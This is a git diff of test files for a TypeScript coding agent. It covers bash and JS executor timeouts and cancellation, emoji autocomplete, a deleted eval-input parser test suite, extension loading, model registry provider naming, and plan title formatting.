730331bd2..f728efac4 100644 --- a/packages/coding-agent/test/bash-executor.test.ts +++ b/packages/coding-agent/test/bash-executor.test.ts @@ -10,6 +10,9 @@ import * as shellSnapshot from "@oh-my-pi/pi-coding-agent/utils/shell-snapshot"; // Matches the schema default for `tools.artifactHeadBytes` (20 KB) used by // OutputSink when bash-executor pulls settings via resolveOutputSinkHeadBytes. const ARTIFACT_HEAD_BYTES_DEFAULT = 20 * 1024; +const BACKGROUND_COMPLETION_RACE_MS = 750; +const KILL_MARKER_DELAY_SECONDS = "0.4"; +const KILL_MARKER_ASSERTION_WAIT_MS = 900; function makeTempDir(): string { return fs.mkdtempSync(path.join(os.tmpdir(), "omp-bash-exec-")); @@ -95,13 +98,18 @@ describe("executeBash", () => { if (process.platform === "win32") { return; } - const start = Date.now(); - const result = await executeBash("{ sleep 5; } & echo fg", { + const runPromise = executeBash("{ sleep 2; } & echo fg", { cwd: tempDir, timeout: 5000, }); - expect(result.output).toContain("fg"); - expect(Date.now() - start).toBeLessThan(3000); + const timed = await Promise.race([ + runPromise.then(result => ({ type: "result" as const, result })), + Bun.sleep(BACKGROUND_COMPLETION_RACE_MS).then(() => ({ type: "timeout" as const })), + ]); + expect(timed.type).toBe("result"); + if (timed.type === "result") { + expect(timed.result.output).toContain("fg"); + } }); it("returns a real PID for background external commands", async () => { @@ -369,13 +377,13 @@ describe("executeBash", () => { it("completes even when background job keeps stdout pipe open", async () => { if (process.platform === "win32") return; - const runPromise = executeBash("{ sleep 3; echo late; } & echo immediate", { + const runPromise = executeBash("{ sleep 2; echo late; } & echo immediate", { cwd: tempDir, timeout: 5000, }); const timed = await Promise.race([ runPromise.then(result => ({ type: "result" as const, result })), - Bun.sleep(1500).then(() => ({ type: "timeout" as const })), + Bun.sleep(BACKGROUND_COMPLETION_RACE_MS).then(() => ({ type: "timeout" as const })), ]); expect(timed.type).toBe("result"); @@ -389,17 +397,18 @@ describe("executeBash", () => { if (process.platform === "win32") return; const marker = path.join(tempDir, "marker.txt"); + const markerEscaped = marker.replace(/'/g, "'\\''"); - // Command creates marker after 2s, but we timeout after 100ms - const result = await executeBash(`sleep 2 && echo done > ${marker}`, { + // Command creates marker after a short delay, but we timeout before then. + const result = await executeBash(`sleep ${KILL_MARKER_DELAY_SECONDS} && echo done > '${markerEscaped}'`, { cwd: tempDir, timeout: 100, }); expect(result.cancelled).toBe(true); - // Wait longer than the command would have taken - await Bun.sleep(3000); + // Wait longer than the command would have needed to create the marker. + await Bun.sleep(KILL_MARKER_ASSERTION_WAIT_MS); // If process was killed (not orphaned), marker should NOT exist expect(fs.existsSync(marker)).toBe(false); @@ -411,14 +420,17 @@ describe("executeBash", () => { const marker = path.join(tempDir, "marker-bg.txt"); const markerEscaped = marker.replace(/'/g, "'\\''"); - const result = await executeBash(`{ sleep 2; echo done > '${markerEscaped}'; } & sleep 10`, { - cwd: tempDir, - timeout: 100, - }); + const result = await executeBash( + `{ sleep ${KILL_MARKER_DELAY_SECONDS}; echo done > '${markerEscaped}'; } & sleep 10`, + { + cwd: tempDir, + timeout: 100, + }, + ); expect(result.cancelled).toBe(true); - await Bun.sleep(3000); + await Bun.sleep(KILL_MARKER_ASSERTION_WAIT_MS); expect(fs.existsSync(marker)).toBe(false); }); @@ -429,19 +441,23 @@ describe("executeBash", () => { const markerEscaped = marker.replace(/'/g, "'\\''"); const controller = new AbortController(); - const promise = executeBash(`{ sleep 2; echo done > '${markerEscaped}'; } & sleep 10`, { - cwd: tempDir, - timeout: 10000, - signal: controller.signal, - }); + const promise = executeBash( + `{ sleep ${KILL_MARKER_DELAY_SECONDS}; echo done > '${markerEscaped}'; } & sleep 10`, + { + cwd: tempDir, + timeout: 10000, + signal: controller.signal, + }, + ); await Bun.sleep(100); controller.abort(); const result = await promise; expect(result.cancelled).toBe(true); + expect(result.output).toContain("Command cancelled"); - await Bun.sleep(3000); + await Bun.sleep(KILL_MARKER_ASSERTION_WAIT_MS); expect(fs.existsSync(marker)).toBe(false); }); @@ -449,24 +465,26 @@ describe("executeBash", () => { if (process.platform === "win32") return; const marker = path.join(tempDir, "marker.txt"); + const markerEscaped = marker.replace(/'/g, "'\\''"); const controller = new AbortController(); - // Command creates marker after 2s - const promise = executeBash(`sleep 2 && echo done > ${marker}`, { + // Command creates marker after a short delay. + const promise = executeBash(`sleep ${KILL_MARKER_DELAY_SECONDS} && echo done > '${markerEscaped}'`, { cwd: tempDir, timeout: 10000, signal: controller.signal, }); - // Abort after 100ms + // Abort before the command can create the marker. await Bun.sleep(100); controller.abort(); const result = await promise; expect(result.cancelled).toBe(true); + expect(result.output).toContain("Command cancelled"); - // Wait longer than the command would have taken - await Bun.sleep(3000); + // Wait longer than the command would have needed to create the marker. + await Bun.sleep(KILL_MARKER_ASSERTION_WAIT_MS); // If process was killed (not orphaned), marker should NOT exist expect(fs.existsSync(marker)).toBe(false); diff --git a/packages/coding-agent/test/core/js-executor.test.ts b/packages/coding-agent/test/core/js-executor.test.ts index d424437e6..3d33d369d 100644 --- a/packages/coding-agent/test/core/js-executor.test.ts +++ b/packages/coding-agent/test/core/js-executor.test.ts @@ -1,4 +1,4 @@ -import { afterEach, beforeEach, describe, expect, it, vi } from "bun:test"; +import { afterAll, afterEach, beforeAll, describe, expect, it, vi } from "bun:test"; import * as path from "node:path"; import type { AgentTool, AgentToolResult } from "@oh-my-pi/pi-agent-core"; import { Settings } from "@oh-my-pi/pi-coding-agent/config/settings"; @@ -42,7 +42,7 @@ describe("executeJs", () => { let sessionFile: string; let sessionId: string; - beforeEach(async () => { + beforeAll(async () => { tempDir = TempDir.createSync("@js-executor-"); sessionFile = path.join(tempDir.path(), "session.jsonl"); sessionId = `session:${sessionFile}:cwd:${tempDir.path()}`; @@ -61,10 +61,13 @@ describe("executeJs", () => { await Bun.write(path.join(tempDir.path(), "config.yaml"), "name: demo\nenabled: true\n"); }); - afterEach(async () => { + afterEach(() => { + vi.restoreAllMocks(); + }); + + afterAll(async () => { await disposeAllVmContexts(); tempDir.removeSync(); - vi.restoreAllMocks(); }); it("persists bindings across calls and reset clears them", async () => { @@ -417,19 +420,6 @@ describe("executeJs", () => { expect(result.displayOutputs).toEqual([{ type: "json", data: { answer: 42, nested: { ok: true } } }]); }); - it("cancels execution when the timeout expires", async () => { - const result = await executeJs("await new Promise(() => {})", { - sessionId, - session, - sessionFile, - timeoutMs: 20, - }); - - expect(result.cancelled).toBe(true); - expect(result.exitCode).toBeUndefined(); - expect(result.output).toContain("Command timed out"); - }); - it('rewrites static `import { x } from "pkg"` to dynamic import', async () => { const result = await executeJs('import { join } from "node:path";\nreturn join("a", "b");', { sessionId, @@ -460,4 +450,17 @@ describe("executeJs", () => { // No JSON display because structuredClone fails on the embedded function. expect(result.displayOutputs.filter(o => o.type === "json")).toHaveLength(0); }); + + it("cancels execution when the timeout expires", async () => { + const result = await executeJs("await new Promise(() => {})", { + sessionId, + session, + sessionFile, + timeoutMs: 20, + }); + + expect(result.cancelled).toBe(true); + expect(result.exitCode).toBeUndefined(); + expect(result.output).toContain("Command timed out"); + }); }); diff --git a/packages/coding-agent/test/emoji-autocomplete.test.ts b/packages/coding-agent/test/emoji-autocomplete.test.ts new file mode 100644 index 000000000..0d02b61f9 --- /dev/null +++ b/packages/coding-agent/test/emoji-autocomplete.test.ts @@ -0,0 +1,86 @@ +import { describe, expect, it } from "bun:test"; +import { applyEmojiCompletion, getEmojiSuggestions, tryEmojiInlineReplace } from "../src/modes/emoji-autocomplete"; + +describe("emoji autocomplete", () => { + describe("getEmojiSuggestions", () => { + it("returns null for empty query (bare colon)", () => { + expect(getEmojiSuggestions(":")).toBeNull(); + expect(getEmojiSuggestions("note:")).toBeNull(); + }); + + it("returns prefix matches at line start", () => { + const r = getEmojiSuggestions(":joy"); + expect(r).not.toBeNull(); + expect(r!.prefix).toBe(":joy"); + const names = r!.items.map(i => i.label); + expect(names.some(n => n.includes(":joy:"))).toBe(true); + expect(names.every(n => n.includes(":joy"))).toBe(true); + }); + + it("returns prefix matches after whitespace", () => { + const r = getEmojiSuggestions("hello :sm"); + expect(r).not.toBeNull(); + expect(r!.prefix).toBe(":sm"); + expect(r!.items.length).toBeGreaterThan(0); + }); + + it("does not trigger when colon is mid-token", () => { + expect(getEmojiSuggestions("http://example")).toBeNull(); + expect(getEmojiSuggestions("foo:bar")).toBeNull(); + }); + + it("returns null for unknown prefix", () => { + expect(getEmojiSuggestions(":zzzzzz")).toBeNull(); + }); + + it("excludes regional-indicator flag sequences", () => { + // `:jordan:` exists upstream as 🇯🇴 but should be filtered out. + const r = getEmojiSuggestions(":jordan"); + expect(r).toBeNull(); + }); + + it("caps the suggestion count", () => { + const r = getEmojiSuggestions(":a"); + expect(r).not.toBeNull(); + expect(r!.items.length).toBeLessThanOrEqual(12); + }); + }); + + describe("tryEmojiInlineReplace", () => { + it("returns null without trailing colon", () => { + expect(tryEmojiInlineReplace(":joy")).toBeNull(); + expect(tryEmojiInlineReplace("hello")).toBeNull(); + }); + + it("returns replacement for valid closing form", () => { + const r = tryEmojiInlineReplace(":joy:"); + expect(r).toEqual({ replaceLen: 5, insert: "😂" }); + }); + + it("returns replacement when preceded by whitespace", () => { + const r = tryEmojiInlineReplace("hi :tada:"); + expect(r).toEqual({ replaceLen: 6, insert: "🎉" }); + }); + + it("returns null for unknown name", () => { + expect(tryEmojiInlineReplace(":notrealemoji:")).toBeNull(); + }); + + it("returns null when colon is mid-word", () => { + expect(tryEmojiInlineReplace("foo:joy:")).toBeNull(); + }); + + it("returns null for filtered flag shortcodes", () => { + expect(tryEmojiInlineReplace(":jordan:")).toBeNull(); + }); + }); + + describe("applyEmojiCompletion", () => { + it("replaces the prefix with the emoji character", () => { + const r = applyEmojiCompletion(["hello :joy"], 0, 10, { value: "😂", label: "😂 :joy:" }, ":joy"); + expect(r.lines).toEqual(["hello 😂"]); + expect(r.cursorLine).toBe(0); + expect(r.cursorCol).toBe("hello ".length + "😂".length); + }); + }); +}); diff --git a/packages/coding-agent/test/eval/parse.test.ts b/packages/coding-agent/test/eval/parse.test.ts deleted file mode 100644 index 99d56e86f..000000000 --- a/packages/coding-agent/test/eval/parse.test.ts +++ /dev/null @@ -1,352 +0,0 @@ -import { describe, expect, it } from "bun:test"; -import { parseEvalInput } from "../../src/eval/parse"; - -describe("parseEvalInput", () => { - it("parses a single cell with title and timeout", () => { - const result = parseEvalInput(`*** Cell py:"setup" t:10s -print("hi") -`); - expect(result.cells).toHaveLength(1); - expect(result.cells[0]).toMatchObject({ - index: 0, - title: "setup", - language: "python", - languageOrigin: "header", - timeoutMs: 10_000, - reset: false, - code: 'print("hi")', - }); - }); - - it("treats rst as a per-cell kernel wipe", () => { - const result = parseEvalInput(`*** Cell py:"bootstrap" -import json - -*** Cell js:"" rst -const x = 1; -`); - expect(result.cells).toHaveLength(2); - expect(result.cells[0].reset).toBe(false); - expect(result.cells[1].reset).toBe(true); - expect(result.cells[1].language).toBe("js"); - }); - - it("accepts case-insensitive language tokens (lenient)", () => { - const result = parseEvalInput(`*** Cell JS:"" -const a = 1; -*** Cell PY:"" -print("py") -`); - expect(result.cells).toHaveLength(2); - expect(result.cells[0].language).toBe("js"); - expect(result.cells[1].language).toBe("python"); - }); - - it("parses millisecond, second, and minute durations", () => { - const result = parseEvalInput(`*** Cell py:"a" t:500ms -a = 1 -*** Cell py:"b" t:5 -a = 2 -*** Cell py:"c" t:2m -a = 3 -`); - expect(result.cells.map(c => c.timeoutMs)).toEqual([500, 5000, 120_000]); - }); - - it("preserves blank lines inside the cell body", () => { - const result = parseEvalInput(`*** Cell js:"" -const x = 1; - -const y = 2; -`); - expect(result.cells).toHaveLength(1); - expect(result.cells[0].code).toBe("const x = 1;\n\nconst y = 2;"); - }); - - it("treats blank lines between cells as separators, not code", () => { - const result = parseEvalInput(`*** Cell py:"" -print("a") - - -*** Cell py:"" -print("b") -`); - expect(result.cells).toHaveLength(2); - expect(result.cells[0].code).toBe('print("a")'); - expect(result.cells[1].code).toBe('print("b")'); - }); - - it("falls back to language sniffing when the header has no recognized language", () => { - // Bare `ruby` doesn't match LANG_TITLE, but the parser is lenient and - // falls back to body sniffing. - const result = parseEvalInput(`*** Cell ruby:"x" -const x = 1; -`); - expect(result.cells).toHaveLength(1); - expect(result.cells[0].languageOrigin).toBe("default"); - expect(result.cells[0].language).toBe("js"); - }); - - it("accepts `**Cell` (two stars) as well as `***Cell`", () => { - const result = parseEvalInput(`**Cell py:"" -print(1) -`); - expect(result.cells).toHaveLength(1); - expect(result.cells[0].language).toBe("python"); - }); - - it("implicitly closes a cell when a new *** Cell appears without *** End", () => { - const result = parseEvalInput(`*** Cell py:"" -print("a") -*** Cell js:"" -const x = 1; -`); - expect(result.cells).toHaveLength(2); - expect(result.cells[0].code).toBe('print("a")'); - expect(result.cells[1].code).toBe("const x = 1;"); - }); - - it("tolerates `*** End` as an optional cell terminator (GPT quirk)", () => { - const result = parseEvalInput(`*** Cell py:"" -print(1) -*** End -*** Cell js:"" -const x = 1; -*** End -`); - expect(result.cells).toHaveLength(2); - expect(result.cells[0].code).toBe("print(1)"); - expect(result.cells[1].code).toBe("const x = 1;"); - }); - - it("ignores anything trailing `*** End` (leniency)", () => { - const result = parseEvalInput(`*** Cell py:"" -print(1) -*** End py -`); - expect(result.cells).toHaveLength(1); - expect(result.cells[0].code).toBe("print(1)"); - }); - - it("accepts long-form language aliases (Python, JavaScript, TypeScript)", () => { - const result = parseEvalInput(`*** Cell Python:"" -print(1) -*** Cell JavaScript:"" -const a = 1; -*** Cell TypeScript:"" -const b = 2; -`); - expect(result.cells.map(c => c.language)).toEqual(["python", "js", "js"]); - }); - - it("implicitly closes the final cell at EOF when *** End is missing", () => { - const result = parseEvalInput(`*** Cell py:"" -print(1) -`); - expect(result.cells).toHaveLength(1); - expect(result.cells[0].code).toBe("print(1)"); - }); - - it("treats bare code without any *** Cell as a single implicit cell", () => { - const result = parseEvalInput(`def greet():\n print('hi')\ngreet()\n`); - expect(result.cells).toHaveLength(1); - expect(result.cells[0]).toMatchObject({ - languageOrigin: "default", - language: "python", - code: "def greet():\n print('hi')\ngreet()", - }); - }); - - it("strips a markdown code fence wrapper and uses its language tag", () => { - const result = parseEvalInput("```js\nconst x = 1;\n```\n"); - expect(result.cells).toHaveLength(1); - expect(result.cells[0]).toMatchObject({ - language: "js", - languageOrigin: "header", - code: "const x = 1;", - }); - }); - - it("rejects invalid duration", () => { - expect(() => - parseEvalInput(`*** Cell py:"" t:forever -print(1) -`), - ).toThrow(/invalid duration/); - }); - - it("supports titles with embedded spaces", () => { - const result = parseEvalInput(`*** Cell py:"load and validate config" -print(1) -`); - expect(result.cells).toHaveLength(1); - expect(result.cells[0].title).toBe("load and validate config"); - }); - - it('treats empty title (`py:""`) as no title', () => { - const result = parseEvalInput(`*** Cell py:"" -print(1) -`); - expect(result.cells).toHaveLength(1); - expect(result.cells[0].title).toBeUndefined(); - expect(result.cells[0].language).toBe("python"); - }); - - it("accepts bare language token without title (lenient form)", () => { - // Parser is more permissive than the lark; bare `py` is accepted - // even though the canonical form is `py:"title"`. - const result = parseEvalInput(`*** Cell py -print(1) -`); - expect(result.cells).toHaveLength(1); - expect(result.cells[0].language).toBe("python"); - expect(result.cells[0].title).toBeUndefined(); - }); - - describe("attribute leniency (accepted but not advertised)", () => { - it("accepts id aliases (title/name/cell/file/label)", () => { - const aliases = ["title", "name", "cell", "file", "label"]; - for (const alias of aliases) { - const result = parseEvalInput(`*** Cell py ${alias}:"hi"\nprint(1)\n`); - expect(result.cells[0].title).toBe("hi"); - } - }); - - it("accepts t aliases (timeout/duration/time)", () => { - const aliases = ["timeout", "duration", "time"]; - for (const alias of aliases) { - const result = parseEvalInput(`*** Cell py ${alias}:5s\nprint(1)\n`); - expect(result.cells[0].timeoutMs).toBe(5000); - } - }); - - it("accepts `reset` as an alias for `rst`", () => { - const result = parseEvalInput(`*** Cell py reset\nprint(1)\n`); - expect(result.cells[0].reset).toBe(true); - }); - - it("accepts `rst:true|false|1|0|yes|no|on|off`", () => { - for (const v of ["true", "1", "yes", "on"]) { - const r = parseEvalInput(`*** Cell py rst:${v}\nx\n`); - expect(r.cells[0].reset).toBe(true); - } - for (const v of ["false", "0", "no", "off"]) { - const r = parseEvalInput(`*** Cell py rst:${v}\nx\n`); - expect(r.cells[0].reset).toBe(false); - } - }); - - it("rejects an invalid rst value", () => { - expect(() => parseEvalInput(`*** Cell py rst:maybe\nx\n`)).toThrow(/invalid rst/); - }); - - it("accepts single-quoted titles (`id:'hi'`)", () => { - const result = parseEvalInput(`*** Cell py id:'hello world'\nprint(1)\n`); - expect(result.cells[0].title).toBe("hello world"); - }); - - it("accepts a bare positional duration token (e.g. `30s`)", () => { - const result = parseEvalInput(`*** Cell py 2m\nprint(1)\n`); - expect(result.cells[0].timeoutMs).toBe(120_000); - }); - - it("first occurrence wins for repeated keys (canonical or alias)", () => { - const result = parseEvalInput(`*** Cell py id:"first" name:"second" t:1s timeout:5s\nprint(1)\n`); - expect(result.cells[0].title).toBe("first"); - expect(result.cells[0].timeoutMs).toBe(1000); - }); - - it("unclassified bare tokens accumulate as a positional title", () => { - const result = parseEvalInput(`*** Cell py setup phase\nprint(1)\n`); - expect(result.cells[0].title).toBe("setup phase"); - }); - }); - - describe("*** Abort recovery sentinel (harmony-leak mitigation)", () => { - it("drops the in-progress cell and stops parsing", () => { - const result = parseEvalInput(`*** Cell py:"" -print("a") -*** Cell js:"" -const partial = 1; /* contamination starts mid-cell */ -*** Abort -*** Cell js:"" -const never_runs = 1; -`); - expect(result.aborted).toBe(true); - expect(result.cells).toHaveLength(1); - expect(result.cells[0].language).toBe("python"); - expect(result.cells[0].code).toBe('print("a")'); - }); - - it("`*** End` before `*** Abort` preserves the closed cell", () => { - // Without `*** End`, the parser can't tell whether the cell was - // complete before contamination — by design, since `*** End` is - // optional and undocumented. Explicit `*** End` is the GPT quirk - // that signals "cell is closed, abort is between cells". - const result = parseEvalInput(`*** Cell py:"" -print("a") -*** End - -*** Abort - -*** Cell py:"" -print("never") -`); - expect(result.aborted).toBe(true); - expect(result.cells).toHaveLength(1); - expect(result.cells[0].code).toBe('print("a")'); - }); - - it("implicit-cell input containing *** Abort is rejected entirely", () => { - const result = parseEvalInput(`print("partial") -*** Abort -`); - expect(result.aborted).toBe(true); - expect(result.cells).toHaveLength(0); - }); - - it("appended sentinel from harmony-leak truncation: abort flag set, prior cell dropped", () => { - const truncated = `*** Cell py:""\nprint("ok")\n*** Abort\n`; - const result = parseEvalInput(truncated); - expect(result.aborted).toBe(true); - expect(result.cells).toHaveLength(0); - }); - - it("absent sentinel: aborted is undefined (not falsely set)", () => { - const result = parseEvalInput(`*** Cell py:"" -print(1) -`); - expect(result.aborted).toBeUndefined(); - }); - }); - - it("does not crash on stray non-marker lines between cells", () => { - // Regression for "null is not an object (evaluating - // 'BEGIN_RE.exec(lines[i])[1]')" — stray fragments must not crash. - // Without `*** End`, the stray junk folds into the prior cell's body; - // the contract for this test is just "don't crash". - const result = parseEvalInput(`*** Cell py:"" -print("a") -stray junk that is not a marker -*** Cell py:"" -print("b") -`); - expect(result.aborted).toBeUndefined(); - expect(result.cells).toHaveLength(2); - expect(result.cells[0].code).toContain('print("a")'); - expect(result.cells[1].code).toBe('print("b")'); - }); - - it("does not crash on trailing stray content after the final cell", () => { - const result = parseEvalInput(`*** Cell py:"" -print(1) -leftover model chatter -more junk -`); - expect(result.aborted).toBeUndefined(); - expect(result.cells).toHaveLength(1); - // Stray lines fold into the cell body (no terminator), which is fine — - // the contract is just "don't crash". - expect(result.cells[0].code).toContain("print(1)"); - }); -}); diff --git a/packages/coding-agent/test/extensions-discovery.test.ts b/packages/coding-agent/test/extensions-discovery.test.ts index 29f51dd90..0ad05f669 100644 --- a/packages/coding-agent/test/extensions-discovery.test.ts +++ b/packages/coding-agent/test/extensions-discovery.test.ts @@ -3,7 +3,7 @@ import * as fs from "node:fs"; import * as path from "node:path"; import { discoverAndLoadExtensions, loadExtensions } from "@oh-my-pi/pi-coding-agent/extensibility/extensions/loader"; import { getProjectAgentDir, TempDir } from "@oh-my-pi/pi-utils"; -import { filterUserExtensionErrors, filterUserExtensions } from "./utils/filter-user-extensions"; +import { filterUserScoped } from "./utils/filter-user-extensions"; describe("extensions discovery", () => { let tempDir: TempDir; @@ -22,8 +22,8 @@ describe("extensions discovery", () => { const result = await discoverAndLoadExtensions(configuredPaths, tempDir.path()); return { ...result, - extensions: filterUserExtensions(result.extensions), - errors: filterUserExtensionErrors(result.errors), + extensions: filterUserScoped(result.extensions), + errors: filterUserScoped(result.errors), }; }; diff --git a/packages/coding-agent/test/extensions-runner.test.ts b/packages/coding-agent/test/extensions-runner.test.ts index 054203631..8f9f76a50 100644 --- a/packages/coding-agent/test/extensions-runner.test.ts +++ b/packages/coding-agent/test/extensions-runner.test.ts @@ -15,7 +15,7 @@ import { import { AuthStorage } from "@oh-my-pi/pi-coding-agent/session/auth-storage"; import { SessionManager } from "@oh-my-pi/pi-coding-agent/session/session-manager"; import { getProjectAgentDir, logger, TempDir } from "@oh-my-pi/pi-utils"; -import { filterUserExtensionErrors, filterUserExtensions } from "./utils/filter-user-extensions"; +import { filterUserScoped } from "./utils/filter-user-extensions"; describe("ExtensionRunner", () => { let tempDir: TempDir; @@ -43,8 +43,8 @@ describe("ExtensionRunner", () => { const result = await discoverAndLoadExtensions(configuredPaths, tempDir.path()); return { ...result, - extensions: filterUserExtensions(result.extensions), - errors: filterUserExtensionErrors(result.errors), + extensions: filterUserScoped(result.extensions), + errors: filterUserScoped(result.errors), }; }; @@ -644,25 +644,25 @@ describe("ExtensionRunner", () => { runner.onError(err => { errors.push(err); }); - testSetExtensionHandlerTimeoutMs(50); + testSetExtensionHandlerTimeoutMs(10); const startedAt = performance.now(); await runner.emit({ type: "session_start" }); const elapsedMs = performance.now() - startedAt; - expect(elapsedMs).toBeGreaterThanOrEqual(40); - expect(elapsedMs).toBeLessThan(250); + expect(elapsedMs).toBeGreaterThanOrEqual(8); + expect(elapsedMs).toBeLessThan(150); expect(fs.readFileSync(markerPath, "utf8")).toBe("fast\n"); expect(warnSpy).toHaveBeenCalledWith("Extension handler timed out", { extensionPath: hangExtensionPath, event: "session_start", - timeoutMs: 50, + timeoutMs: 10, }); expect(errors).toEqual([ { extensionPath: hangExtensionPath, event: "session_start", - error: "handler timed out after 50ms", + error: "handler timed out after 10ms", }, ]); @@ -936,7 +936,7 @@ describe("ExtensionRunner", () => { ); // Drain microtasks so the fire-and-forget emit() calls inside initialize() complete. - await new Promise(resolve => setTimeout(resolve, 50)); + for (let i = 0; i < 5; i++) await Promise.resolve(); const events = fs .readFileSync(eventsPath, "utf8") diff --git a/packages/coding-agent/test/history-storage-search.test.ts b/packages/coding-agent/test/history-storage-search.test.ts index b6e05c838..ad78fb419 100644 --- a/packages/coding-agent/test/history-storage-search.test.ts +++ b/packages/coding-agent/test/history-storage-search.test.ts @@ -1,4 +1,4 @@ -import { afterEach, beforeEach, describe, expect, it } from "bun:test"; +import { afterEach, beforeEach, describe, expect, it, vi } from "bun:test"; import * as fs from "node:fs/promises"; import * as os from "node:os"; import * as path from "node:path"; @@ -13,17 +13,19 @@ async function freshStorage(): Promise<HistoryStorage> { } async function seed(storage: HistoryStorage, prompts: string[]): Promise<void> { - for (const prompt of prompts) { - await storage.add(prompt, "/tmp/test"); - } + const writes = prompts.map(prompt => storage.add(prompt, "/tmp/test")); + vi.advanceTimersByTime(100); + await Promise.all(writes); } beforeEach(() => { HistoryStorage.resetInstance(); + vi.useFakeTimers(); }); afterEach(async () => { HistoryStorage.resetInstance(); + vi.useRealTimers(); if (tempDir) { await fs.rm(tempDir, { recursive: true, force: true }); tempDir = ""; diff --git a/packages/coding-agent/test/model-registry.test.ts b/packages/coding-agent/test/model-registry.test.ts index 911d96666..dd7ef4d17 100644 --- a/packages/coding-agent/test/model-registry.test.ts +++ b/packages/coding-agent/test/model-registry.test.ts @@ -81,7 +81,7 @@ describe("ModelRegistry", () => { } function writeCachedOllamaModels(models: Model<"openai-completions">[]) { - writeModelCache("ollama", Date.now(), models, true, cacheDbPath); + writeModelCache("ollama", Date.now(), models, true, "", cacheDbPath); } function getModelsForProvider(registry: ModelRegistry, provider: string) { @@ -341,11 +341,11 @@ describe("ModelRegistry", () => { test("applies explicit equivalence overrides from config", () => { writeRawModelsConfig({ providers: { - "p-anthropic": providerConfig("https://demo.example.com/v1", [{ id: "corp-sonnet" }]), + "proxy-anthropic": providerConfig("https://demo.example.com/v1", [{ id: "corp-sonnet" }]), }, equivalence: { overrides: { - "p-anthropic/corp-sonnet": "claude-sonnet-4-5", + "proxy-anthropic/corp-sonnet": "claude-sonnet-4-5", }, }, }); @@ -353,7 +353,7 @@ describe("ModelRegistry", () => { const registry = new ModelRegistry(authStorage, modelsJsonPath); const variants = registry.getCanonicalVariants("claude-sonnet-4-5"); - expect(variants.some(variant => variant.selector === "p-anthropic/corp-sonnet")).toBe(true); + expect(variants.some(variant => variant.selector === "proxy-anthropic/corp-sonnet")).toBe(true); }); test("exclusions keep variants out of canonical grouping", () => { @@ -2032,7 +2032,7 @@ describe("ModelRegistry", () => { describe("provider auth: oauth", () => { test("models from a provider with auth: oauth are marked isOAuth=true", async () => { writeRawModelsJson({ - "p-anthropic": { + "proxy-anthropic": { baseUrl: "https://proxy.example.com", apiKey: "literal-key", api: "anthropic-messages", @@ -2050,19 +2050,19 @@ describe("ModelRegistry", () => { ], }, }); - await authStorage.setRuntimeApiKey("p-anthropic", "literal-key"); + await authStorage.setRuntimeApiKey("proxy-anthropic", "literal-key"); const registry = new ModelRegistry(authStorage, modelsJsonPath); await registry.refresh("offline"); - const model = registry.find("p-anthropic", "claude-sonnet-4-5"); + const model = registry.find("proxy-anthropic", "claude-sonnet-4-5"); expect(model).toBeDefined(); expect(model?.isOAuth).toBe(true); }); test("anthropic-messages providers default to isOAuth=true even without explicit auth", async () => { writeRawModelsJson({ - "p-anthropic": { + "proxy-anthropic": { baseUrl: "https://proxy.example.com", apiKey: "literal-key", api: "anthropic-messages", @@ -2079,19 +2079,19 @@ describe("ModelRegistry", () => { ], }, }); - await authStorage.setRuntimeApiKey("p-anthropic", "literal-key"); + await authStorage.setRuntimeApiKey("proxy-anthropic", "literal-key"); const registry = new ModelRegistry(authStorage, modelsJsonPath); await registry.refresh("offline"); - const model = registry.find("p-anthropic", "claude-sonnet-4-5"); + const model = registry.find("proxy-anthropic", "claude-sonnet-4-5"); expect(model).toBeDefined(); expect(model?.isOAuth).toBe(true); }); test("auth: apiKey opts out of the anthropic-messages default", async () => { writeRawModelsJson({ - "p-anthropic": { + "proxy-anthropic": { baseUrl: "https://proxy.example.com", apiKey: "literal-key", api: "anthropic-messages", @@ -2109,19 +2109,19 @@ describe("ModelRegistry", () => { ], }, }); - await authStorage.setRuntimeApiKey("p-anthropic", "literal-key"); + await authStorage.setRuntimeApiKey("proxy-anthropic", "literal-key"); const registry = new ModelRegistry(authStorage, modelsJsonPath); await registry.refresh("offline"); - const model = registry.find("p-anthropic", "claude-sonnet-4-5"); + const model = registry.find("proxy-anthropic", "claude-sonnet-4-5"); expect(model).toBeDefined(); expect(model?.isOAuth).toBeUndefined(); }); test("non-anthropic apis do not get the OAuth default", async () => { writeRawModelsJson({ - "p-openai": { + "proxy-openai": { baseUrl: "https://proxy.example.com/v1", apiKey: "literal-key", api: "openai-completions", @@ -2138,12 +2138,12 @@ describe("ModelRegistry", () => { ], }, }); - await authStorage.setRuntimeApiKey("p-openai", "literal-key"); + await authStorage.setRuntimeApiKey("proxy-openai", "literal-key"); const registry = new ModelRegistry(authStorage, modelsJsonPath); await registry.refresh("offline"); - const model = registry.find("p-openai", "gpt-5"); + const model = registry.find("proxy-openai", "gpt-5"); expect(model).toBeDefined(); expect(model?.isOAuth).toBeUndefined(); }); @@ -2206,7 +2206,7 @@ describe("ModelRegistry", () => { contextWindow: 1_000_000, maxTokens: 384_000, }; - writeModelCache("ollama-cloud", Date.now(), [cachedModel], true, cacheDbPath); + writeModelCache("ollama-cloud", Date.now(), [cachedModel], true, "", cacheDbPath); const registry = new ModelRegistry(authStorage, modelsJsonPath); diff --git a/packages/coding-agent/test/plan-mode/approved-plan.test.ts b/packages/coding-agent/test/plan-mode/approved-plan.test.ts index 16772d7a7..327c02e22 100644 --- a/packages/coding-agent/test/plan-mode/approved-plan.test.ts +++ b/packages/coding-agent/test/plan-mode/approved-plan.test.ts @@ -2,7 +2,7 @@ import { afterEach, beforeEach, describe, expect, it } from "bun:test"; import * as fs from "node:fs/promises"; import * as os from "node:os"; import * as path from "node:path"; -import { renameApprovedPlanFile } from "@oh-my-pi/pi-coding-agent/plan-mode/approved-plan"; +import { humanizePlanTitle, renameApprovedPlanFile } from "@oh-my-pi/pi-coding-agent/plan-mode/approved-plan"; describe("renameApprovedPlanFile", () => { let tmpDir: string; @@ -45,3 +45,20 @@ describe("renameApprovedPlanFile", () => { await expect(fs.stat(path.join(artifactsDir, "local", "PLAN.md"))).rejects.toThrow(); }); }); + +describe("humanizePlanTitle", () => { + it("replaces separators with spaces and capitalizes", () => { + expect(humanizePlanTitle("migrate-mcp-loader")).toBe("Migrate mcp loader"); + expect(humanizePlanTitle("fix_session_naming")).toBe("Fix session naming"); + expect(humanizePlanTitle("RefactorRouter")).toBe("RefactorRouter"); + }); + + it("collapses runs of separators", () => { + expect(humanizePlanTitle("foo--bar__baz")).toBe("Foo bar baz"); + }); + + it("returns empty string for blank-ish input", () => { + expect(humanizePlanTitle("")).toBe(""); + expect(humanizePlanTitle("---")).toBe(""); + }); +}); diff --git a/packages/coding-agent/test/read-tool-group.test.ts 